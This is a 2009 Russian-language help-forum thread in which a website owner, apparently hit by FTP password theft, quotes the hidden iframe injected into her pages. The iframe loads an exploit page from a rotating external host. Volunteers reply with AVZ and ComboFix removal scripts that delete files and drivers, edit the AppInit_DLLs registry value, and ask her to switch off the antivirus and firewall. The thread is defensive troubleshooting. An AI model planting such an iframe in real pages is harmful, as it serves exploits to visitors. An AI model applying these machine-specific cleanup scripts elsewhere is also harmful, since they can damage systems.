Exploit.JS.Pdfka.ti [LOG+]

[Imperial]

Добрый вечер, господа-борцы за чистоту наших писюшников)

Проблема такая. Вроде ниче из инета подозрительного не качаю, порно не смотрю, вконтакте ссылки от друзей не открываю. Зато имею сайт. Недавно мой сайт поразила подозрительная зараза - после <body> во всех индексовых страницах прописывается

<div style="display:none"><iframe src="http://site.ru:8080/index.php" width=912 height=583 ></iframe></div><div style="display:none"></div><div style="display:none"></div><div style="display:none"></div>

Под site.ru подразумевается куева туча разных адресов сайтов. Каждый день мне приходится вычищать эту фигню. Один раз так вообще съело конец php-файла. У меня стоит Касперский 2009 года с новейшими базами, но Exploit.JS.Pdfka.ti почему-то не детектирует. У другого человека сразу определило этот вирус. Я так понимаю, что эта зараза крадет пароли от FTP через уязвимость в PDF-файлах? Или это - остаток кейлоггера от целого букета вроде бы вылеченных вирусов (Backdoor.Win32.UltimateDefender.igv, Backdoor.Win32.Bredolab.lw, Braviax, Trojan-Clicker.Costrat.gb, Trojan-Downloader.Win32.Boltolog.hkm и иже с ними), с которыми была очень напряженная и жестокая борьба? Пользуюсь FileZilla. Подскажите, откуда это может быть и как с ним бороться...

P.S. Заранее простите за нубскую тему Обратиться более не к кому

Изменено 17 сентября, 2009 пользователем Imperial

[thyrex]

Выполните правила оказания помощи (ссылка в моей подписи)

[Imperial]

воть, сделала все как в гайде)

hijackthis.log

virusinfo_syscheck.zip

virusinfo_syscure.zip

[thyrex]

Выполните скрипт в AVZ

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\Documents and Settings\Finn\Главное меню\Программы\Автозагрузка\ikowin32.exe','');
DeleteFile('.exe');
DeleteFile('C:\Documents and Settings\Finn\Главное меню\Программы\Автозагрузка\ikowin32.exe');
RegKeyStrParamWrite('HKLM', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows', 'AppInit_DLLs', 'C:\PROGRA~1\KASPER~1\KASPER~1\mzvkbd.dll,C:\PROGRA~1\KASPER~1\KASPER~1\mzvkbd3.dll');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

 

Выполнить скрипт в AVZ.

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ отправьте на newvirus@kaspersky.com. Полученный ответ сообщите здесь.

 

Сделайте новые логи

[Imperial]

Доброй ночи, господа.

Скрипты выполнила, письмо на newvirus@kaspersky.com отправила. Вот какой ответ мне пришел:

"Hello,

ikowin32.exe_ - Backdoor.Win32.Bredolab.yo

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

 

Сообщение от модератора User

Убрал имя аналитика

http://www.kaspersky.com http://www.viruslist.com"

 

Прилагаю логи.

virusinfo_syscheck.zip

virusinfo_syscure.zip

hijackthis.log

[thyrex]

В этих логах ничего подозрительного. Что с проблемой?

[Imperial]

Сменила пароль на FTP. Посмотрим, что будет через денек...

До смены пароля (16 часов) эксплоит заразил страничку где-то в 12.

[Imperial]

После смены пароля с сайтом все в порядке =) большое спасибо за помощь!

Зато сегодня Каспер нашел новую модификацию Бредолаба - Bredolab.lw + подгрузил Trojan-Banker.Win32.Bancos.gck. Не работал интернет в течении нескольких часов, исходящий траффик был больше, чем входящий. Как его убить полностью?

Логи прилагаются.

hijackthis.log

virusinfo_syscheck.htm

virusinfo_syscheck.zip

virusinfo_syscure.zip

Изменено 21 сентября, 2009 пользователем Imperial

[thyrex]

Где антивирус находил эти файлы? Случайно не в папке временных файлов?

[ТроПа]

Выполните, пожалуйста, ещё это:

Скачайте ComboFix здесь, здесь или здесь и сохраните на рабочий стол.

 

1. Внимание! Обязательно закройте все браузеры, временно выключите антивирус, firewall и другое защитное программное обеспечение. Не запускайте других программ во время работы Combofix. Combofix может отключить интернет через некоторое время после запуска, не переподключайте интернет пока Combofix не завершит работу. Если интернет не появился после окончания работы Combofix, перезагрузите компьютер. Во время работы Combofix не нажимайте кнопки мыши, это может стать причиной зависания Combofix.

2. Запустите combofix.exe, когда процесс завершится лог сохраниться в файл C:\ComboFix.txt

 

Прим: В случае, если ComboFix не запускается, переименуйте combofix.exe в combo-fix.exe

 

Пркнепите лог ComboFix к следующему сообщению.

[Imperial]

...рано обрадовалась... на сайте опять тот же эксплоит...

Где антивирус находил эти файлы? Случайно не в папке временных файлов?

Backdoor.Win32.Bredolab.lw - C:\WINDOWS\pss\ikowin32.exeStartup

Trojan-Banker.Win32.Bancos.gck нашел действительно в temp.

 

Лог КомбоФикса прилагаю

ComboFix.txt

[akoK]

c:\windows\system32\dllcache\beep.sys - отправьте в вирлаб

 

 

Скопируйте текст ниже в блокнот и сохраните как файл с названием CFScript.txt на рабочий стол.

KillAll::

File::
c:\windows\system32\drivers\b411f1de.sys 
c:\documents and settings\Finn\Главное меню\Программы\Автозагрузка\ikowin32.exe
c:\windows\pss\ikowin32.exe
Driver::
b411f1de
Folder::

Registry::
[-HKLM\~\startupfolder\c:^documents and settings^finn^Главное меню^Программы^Автозагрузка^ikowin32.exe]
FileLook::

 

После сохранения переместите CFScript.txt на пиктограмму ComboFix.exe.

Когда сохранится новый отчет ComboFix, запакуйте ComboFix.txt и прикрепите к сообщению.

Изменено 22 сентября, 2009 пользователем akoK

[Imperial]

Мм, на newvirus@kaspersky.ru?

ComboFix.txt

[thyrex]

На newvirus@kaspersky.com

[akoK]

Деинсталлируйте ComboFix: нажмите Пуск => Выполнить в окне наберите команду Combofix /u, нажмите кнопку "ОК"

 

Скачайте OTCleanIt, запустите, нажмите Clean up